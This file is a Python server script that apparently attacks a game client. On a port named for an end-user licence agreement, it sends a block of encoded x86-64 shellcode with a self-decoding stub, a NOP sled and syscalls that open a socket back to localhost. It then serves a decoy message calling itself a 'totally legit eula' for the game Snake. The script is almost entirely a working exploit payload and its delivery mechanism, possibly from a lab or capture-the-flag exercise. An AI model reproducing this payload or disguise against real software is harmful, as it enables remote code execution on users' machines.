import socket

EULA_PORT = 10000
NOTIFCATION_PORT = 10001
ACTUAL_EULA_PORT = 10005
HOST_ADDRESS = 'localhost'

eula_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
eula_socket.bind((HOST_ADDRESS, EULA_PORT))
eula_socket.listen(1)

notify_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
notify_socket.bind((HOST_ADDRESS, NOTIFCATION_PORT))
notify_socket.listen(1)

second_eula_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
second_eula_socket.bind((HOST_ADDRESS, ACTUAL_EULA_PORT))
second_eula_socket.listen(1)


while True:
    eula_conn, eula_addr = eula_socket.accept()
    eula_conn.send(b"\x48\xB8\x11\x11\x11\x11\x11\x11\x11\x11\x48\xB9\x26\x7E\x10\x11\x11\x11\x11\x11\x48\x29\xC8\x48\x89\xC2\x66\xBA\xFF\xFF\x66\x83\xEA\xFF\x80\x38\xCD\x75\x04\x80\x28\xCD\x48\x83\xC0\x01\x66\x83\xC2\x01\x66\x81\xFA\xD0\x03\x72\xE9\x90\x90\x90\x90\x90\x90\xB8\x4A\xCD\xCD\x02\x48\xBF\xCD\x40\xCD\xCD\xCD\xCD\xCD\xCD\x48\xC7\xC6\xCD\x10\xCD\xCD\x48\xC7\xC2\x07\xCD\xCD\xCD\x0F\x05\x48\xB8\x9B\x41\xCD\xCD\xCD\xCD\xCD\xCD\xC6\xCD\x0F\x90\x48\xB8\xB0\x96\xCD\xCD\xCD\xCD\xCD\xCD\x48\xC7\xCD\x2A\xCD\xCD\xCD\x90\xB8\x61\xCD\xCD\x02\x48\xC7\xC7\x02\xCD\xCD\xCD\x48\xC7\xC6\x01\xCD\xCD\xCD\x48\xC7\xC2\xCD\xCD\xCD\xCD\x0F\x05\x48\x89\xC7\xB8\x62\xCD\xCD\x02\x48\xBE\xA1\x96\xCD\xCD\xCD\xCD\xCD\xCD\xC6\x06\x02\x48\x83\xC6\x01\xC6\x06\x27\x48\x83\xC6\x01\xC6\x06\x15\x48\x83\xC6\x01\x48\xC7\x06\x7F\xCD\xCD\xCD\x48\x83\xC6\x03\x48\xC7\x06\x01\xCD\xCD\xCD\x48\xBE\xA0\x96\xCD\xCD\xCD\xCD\xCD\xCD\x48\xC7\xC2\x10\xCD\xCD\xCD\x0F\x05\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x1D\xCD\xCD\x02\x48\xBE\xB0\x92\xCD\xCD\xCD\xCD\xCD\xCD\x48\xC7\xC2\xCD\x02\xCD\xCD\x49\xC7\xC2\xCD\xCD\xCD\xCD\x49\xC7\xC0\xCD\xCD\xCD\xCD\x49\xC7\xC1\xCD\xCD\xCD\xCD\x0F\x05\xC3\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\xCD\x02\x02\x02\x02\xAA\xAA\xAA\xAA\xB0\x92\x00")

    eula_conn.close()
    break

input()

while True:
    notify_conn, notify_addr = notify_socket.accept()
    notify_conn.send(b"\x01")
    notify_conn.close()
    break


while True:
    eula2_conn, eula2_addr = second_eula_socket.accept()
    eula2_conn.send(b"This is a totally legit eula for the game Snake. Press any key to accept and play.")
    eula2_conn.close()
    break
